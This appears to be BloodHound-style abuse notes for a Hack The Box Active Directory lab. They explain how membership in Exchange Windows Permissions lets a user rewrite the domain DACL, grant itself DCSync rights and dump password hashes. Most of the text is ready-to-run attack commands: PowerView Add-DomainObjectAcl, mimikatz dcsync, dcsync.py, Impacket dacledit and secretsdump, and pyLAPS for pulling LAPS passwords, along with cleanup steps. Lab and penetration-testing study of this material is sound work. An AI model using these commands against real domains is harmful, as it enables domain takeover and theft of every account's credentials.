WriteDACL Rights

The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permissions to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL

With write access to the target object's DACL, you can grant yourself any privilege you want on the object. Including DcSync

Windows abuse

To abuse WriteDacl to a domain object, you may grant yourself DCSync privileges.

You may need to authenticate to the Domain Controller as a member of EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL if you are not running a process as a member. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL:

Add-DomainObjectAcl -TargetIdentity HTB.LOCAL -Rights DCSync -Principalidentity svc-alfresco

Once you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain

lsadump::dcsync /domain:testlab.local /user:Administrator

Cleanup can be done using the Remove-DomainObjectAcl function:

Remove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync

You can also abuse this without using Windows-based tooling if you are operating from a Linux host. DCSync.py from n00py will let you authenticate with either a plaintext password, NT hash, or kerberos ticket:

To grant the "n00py" user DCSync privileges, authenticating as the user "n00py" with the password "Password123":

./dcsync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local'  n00pyAdministrator:Password123

Source: https://github.com/n00py/DCSync

Linux abuse

To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.

Impacket's dacledit can be used for that purpose (cf. "grant rights" reference for the link).

dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'

Cleanup of the added ACL can be performed later on with the same tool:

DCSync

The AllExtendedRights privilege grants EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL both the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges, which combined allow a principal to replicate objects from the domain HTB.LOCAL.

This can be abused using Impacket's secretsdump.py example script:

secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'

Retrieve LAPS Passwords

If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the AllExtendedRights privilege included grants EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL enough privileges to retrieve LAPS passwords domain-wise.

pyLAPS can be used for that purpose:

pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"